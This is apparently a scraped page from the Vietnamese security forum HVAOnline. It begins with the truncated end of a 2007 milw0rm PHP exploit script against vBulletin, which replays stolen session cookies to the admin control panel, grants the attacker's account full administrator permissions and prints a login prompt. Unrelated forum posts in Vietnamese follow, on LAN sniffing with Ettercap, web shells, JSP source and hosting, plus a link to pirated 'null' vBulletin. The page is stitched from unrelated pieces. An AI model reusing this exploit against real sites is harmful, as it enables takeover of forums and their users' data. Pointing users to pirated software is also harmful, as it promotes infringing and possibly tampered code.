$data.="&user%5Bshowvbcode%5D=1";
$data.="&user%5Bstyleid%5D=0";
$data.="&adminoptions%5Badminavatar%5D=0";
$data.="&adminoptions%5Badminprofilepic%5D=0";
$data.="&user%5Btimezoneoffset%5D=0";
$data.="&options%5Bdstauto%5D=1";
$data.="&options%5Bdstonoff%5D=0";
$data.="&user%5Bdaysprune%5D=-1";
$data.="&user%5Bjoindate%5D%5Bmonth%5D=2";
$data.="&user%5Bjoindate%5D%5Bday%5D=26";
$data.="&user%5Bjoindate%5D%5Byear%5D=2007";
$data.="&user%5Bjoindate%5D%5Bhour%5D=14";
$data.="&user%5Bjoindate%5D%5Bminute%5D=39";
$data.="&user%5Blastactivity%5D%5Bmonth%5D=2";
$data.="&user%5Blastactivity%5D%5Bday%5D=26";
$data.="&user%5Blastactivity%5D%5Byear%5D=2007";
$data.="&user%5Blastactivity%5D%5Bhour%5D=14";
$data.="&user%5Blastactivity%5D%5Bminute%5D=58";
$data.="&user%5Blastpost%5D%5Bmonth%5D=0";
$data.="&user%5Blastpost%5D%5Bday%5D=";
$data.="&user%5Blastpost%5D%5Byear%5D=";
$data.="&user%5Blastpost%5D%5Bhour%5D=";
$data.="&user%5Blastpost%5D%5Bminute%5D=";
$data.="&userid=".$mu_uid;
$data.="&ousergroupid=";
$data.="&odisplaygroupid=0";
$data.="&userfield%5Bfield1_set%5D=1";
$data.="&userfield%5Bfield2_set%5D=1";
$data.="&userfield%5Bfield3_set%5D=1";
$data.="&userfield%5Bfield4_set%5D=1";
$packet ="POST ".$p."admincp/user.php?do=edit&u=$my_uid HTTP/1.0\r\n";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
$packet.="Referer: http://".$host.$path."profile.php\r\n";
$packet.="Accept-Language: en\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Pragma: no-cache\r\n";
$packet.="Cookie: ".$cookie_prefix."lastactivity=0; ".$cookie_prefix."password=".md5(trim($my_hash))."; ".$cookie_prefix."userid=".$uid."; ".$cookie_prefix."sessionhash=".trim($sess_hash)."; ".$cookie_prefix."cpsession=".trim($cpsess_hash).";\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
sleep(1);
//now give full rights to the new Administrator
$data ="do=update";
$data.="&adminhash=".$adminhash;
$data.="&adminpermissions%5Bcanadminsettings%5D=1";
$data.="&adminpermissions%5Bcanadminstyles%5D=1";
$data.="&adminpermissions%5Bcanadminlanguages%5D=1";
$data.="&adminpermissions%5Bcanadminforums%5D=1";
$data.="&adminpermissions%5Bcanadminthreads%5D=1";
$data.="&adminpermissions%5Bcanadmincalendars%5D=1";
$data.="&adminpermissions%5Bcanadminusers%5D=1";
$data.="&adminpermissions%5Bcanadminpermissions%5D=1";
$data.="&adminpermissions%5Bcanadminfaq%5D=1";
$data.="&adminpermissions%5Bcanadminimages%5D=1";
$data.="&adminpermissions%5Bcanadminbbcodes%5D=1";
$data.="&adminpermissions%5Bcanadmincron%5D=1";
$data.="&adminpermissions%5Bcanadminmaintain%5D=1";
$data.="&adminpermissions%5Bcanadminplugins%5D=1";
$data.="&cssprefs=";
$data.="&dismissednews=";
$data.="&userid=".$my_uid;
$data.="&oldpermissions=98300";
$data.="&adminpermissions%5Bcanadminupgrade%5D=0";
$packet ="POST ".$p."admincp/adminpermissions.php?do=update HTTP/1.0\r\n";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
$packet.="Referer: http://".$host.$path."profile.php\r\n";
$packet.="Accept-Language: en\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Pragma: no-cache\r\n";
$packet.="Cookie: ".$cookie_prefix."lastactivity=0; ".$cookie_prefix."password=".md5(trim($my_hash))."; ".$cookie_prefix."userid=".$uid."; ".$cookie_prefix."sessionhash=".trim($sess_hash)."; ".$cookie_prefix."cpsession=".trim($cpsess_hash).";\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
echo "\nnow go to http://".$host.$path."admincp/index.php and login to the control panel...";
?>
# milw0rm.com [2007-02-28]
vậy có thể dùng DC và phân quyền cho nó được không anh conmale? theo em thì Win OS theo chuẩn NTFS thì có chế độ phân quyền giữa Administrator và user rất rõ ràng, chỉ cần vào administrator ngăn cản không cho phép truy cập vào yahoo mesenger là được mà.
Các cách này chỉ sử dụng trên Client và chỉ có nhiệm vụ chặn một số ứng dụng không cho phép người dùng truy cập, còn nếu người dùng tìm cách vượt qua được nó thì thua, không có gì gọi là bảo đãm cho sự bảo mật từ một Client mà không có sự chấp nhận từ server.
Bạn thử dùng Acunetix Web Vulnerability Scanner quét xem, cũng rất hiệu quả.
Theo tôi nếu chỉ cần có sự liên kết giữa các máy trong cùng một mạng nội bộ ( LAN) và tất cả các máy này đều liên kết ra môi trường ngoài là Internet (WAN) thì chuyện này khá dễ dàng bằng Tools Sniffing , thường thì tools này có nhiều dạng và dạng chuyên dụng nhất là EtterCap, đây là một công cụ Sniff data từ tất cả các máy trong LAN khi connect ra internet, thông tin sẽ bị một máy có kết nối trong LAN bắt dữ liệu và như thế không những chỉ user và passwd của bạn bị lộ mà tất cả những thông tin nhạy cảm nhất.
Vì lý do này mà người bạn của You mới nhờ You login vào Yahoo mesenger .
Với những kiểu Actack bất hợp pháp thì thường rất khó phát hiện được Shell đã được upload lên server bằng cách nào và vào thời điểm nào. Chỉ có thể phát hiện bằng linh cảm và một chút may mắn, vì thường 1 con shell được up lên server thì chỉ cần mất khoãng 3 phút để dò ra user và passwd DATA BASE và mất 0.5 phút để Drop nó, câu hỏi đặt ra là" Liệu trong khoãng thời gian đó bạn có thể Scan hoặc tìm ra con shell mà Actacker Up lên không?
Thôi thì cách tốt nhất là cập nhật các New bugs thường xuyên và xem thử source web của mình có nằm trong danh sách đó hay không? nếu có thì cập nhật bản sữa lỗi hoặc tự fix lỗi.
Shell được up lên là trường hợp hy hữu và nếu nói sự nhận biết thì tới khi nó Drop hoặc up trang Deface lên thì mới biết là Site mình đã bị hacked smilie).

conmale wrote:

Nên tạo một chủ đề mới trong box "Web Programming" để thảo luận các vấn đề kỹ thuật. 


:cry: vâng, em nghe.
Em cũng vẫn chưa hiểu rõ lắm về nguyên lý hoạt động của Source web JSP, Em nghĩ thì chắc là nó cũng giống như một số ứng dụng web khác được viết trên các ngôn ngữ lập trình như php và ASP.net, vậy thì chắc là nó sẽ có những mã nguồn có thể xem được chứ nhỉ?
Như anh conmale đã phân tích như trên, JSP là một Open Source , vậy em có thể dùng JDK và Eclipse để View Source của nó được không ạ?và nếu được thì có thể dùng cách nào ạ? em có làm thử nhưng thấy chưa được. em muốn làm 1 host ảo Support JSP đó là cài Apache Tomcat và JSP Plugin trên PC được không ạ? và những thứ như thế đã đủ chưa?
Mình nghĩ chắc là hok có gì xa đâu, vì mỗi lần bạn post 1 bài viết là có Moderator vào trả lời liền mà, vậy chứng tỏ họ luôn quan tâm đến các bạn đấy chứ, nhưng ở mức độ cho phép.
Hơ, ý kiến này sao mà giống của mình thế, chắc anh con ma le này không xem bài của mình quá, smilie) cái này người ta gọi là Spammer ý.
Nói thế cho vui chứ em còn phải học hỏi bậc đàn anh nhìu lắm, mà thiết nghĩ đâu phải anh con ma le cái gì cũng biết đâu nhỉ, chắc ảnh ngoài đời có thể là 1 người luộm thuộm , đầu tóc rối bù , như vậy là thua chắc đàn em cái khoản cưa gái goài, hehe...
Em hơi thắc mắc một chút xíu là tạo sao các anh không mở thêm phần Live Chat vừa giúp anh em tiết kiệm thời gian (Không gián tiếp qua Y! mừ)  


Bạn nghĩ là ai cũng có thời gian để ngồi chat cả ngày với bạn sao? hay là bạn nghĩ rằng những trả lời trong HVA không đủ cho bạn? Hay bạn muốn có một live Chat để Spam cho đã? Tất cả mọi người trong forum đều đang đi làm và phải đối diện với cuộc sống mưu sinh hàng ngày. Do đó chắc có lẽ điều này rất khó thành hiện thực mà có lẽ cũng không cần thiết lắm.
Em còn một thỉnh cầu nửa các Admin có thể tạo thêm chuyên mục dành cho người hâm mộ được không.
Nói về tầng lớp Master í mà như vậy các bạn mới vào như em có thể biết thêm về tiểu sử và khả năng của từng người....  


Người hâm mộ? bạn sẽ hâm mộ ai trong tất cả những Moderator? Họ cũng có những lo lắng riêng của họ, họ đã đến âm thầm và lặng lẽ, giờ bạn muốn làm như thế không khác nào làm xáo trộn cuộc sống của họ trên mạng và ngoài đời. có lẽ mình khuyên bạn nên suy nghĩ theo một hướng tích cực hơn bạn à.
Có một câu nói" trên cuộc đời, tất cả đều là sự đổi chác, nếu muốn đạt được cái này thì phải chấp nhận hy sinh cái kia, và ngược lại." Mình nghĩ là họ đã chịu hy sinh quá nhiều rồi. bạn hiểu ý mình chứ?
Đó chỉ là 1 ý kiến riêng của cá nhân mình.
2.Theo mình biết thì "tốc độ load" không bị chi phối bởi vị trị địa lý. 


cảm ơn bạn đã cho mình biết máy chủ đặt ở Nhật, tuy nhiên bạn nói Tốc độ Up và Load không phụ thuộc vào vị trí địa lý à? cái này không biết có đúng không nhỉ?
Tại sao từ việt nam truy cập tới một server đặt ở Hồng Kông lại nhanh hơn so với truy cập một server đặt ở mỹ vậy bạn?
Theo như nhận xét của riêng tôi thì tôi thấy tốc độ Load của Hosting chứa Source của HVA là rất nhanh, không biết có phải do Source (Jforum)có cấu trúc gọn không hay là do Hosting được đặt ở Hồng kông nên Load nhanh đến như vậy.
Tôi cũng muốn mua một Server giống như HVA để bán Host và làm Reseller ở Hồng kông nhưng chưa biết giá cả và tốc độ thế nào , xin những người có kinh nghiệm cho tôi một lời khuyên tốt nhất.

Và còn một điều nữa là Source web của Jforum cũng như JSP nói chung có thể dùng trình biên dịch nào để xem được mã nguồn của nó không? vì tôi cũng muốn làm một trang như thế.
xin cảm ơn.
Thử dùng lênh net user , or netstat xem thử đi bạn.
cậu có thể vào đây để download bản null www.congnghethongtinvn.com , có tất cả các bản vbb3.0.x, vbb 3.5.x, và vbb3.6.x. , và có cả cách hướng dẫn cài đặt ,. chúc cậu thànhg công.
 
Go to Page:  First Page Page 1 Page 3 Last Page

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|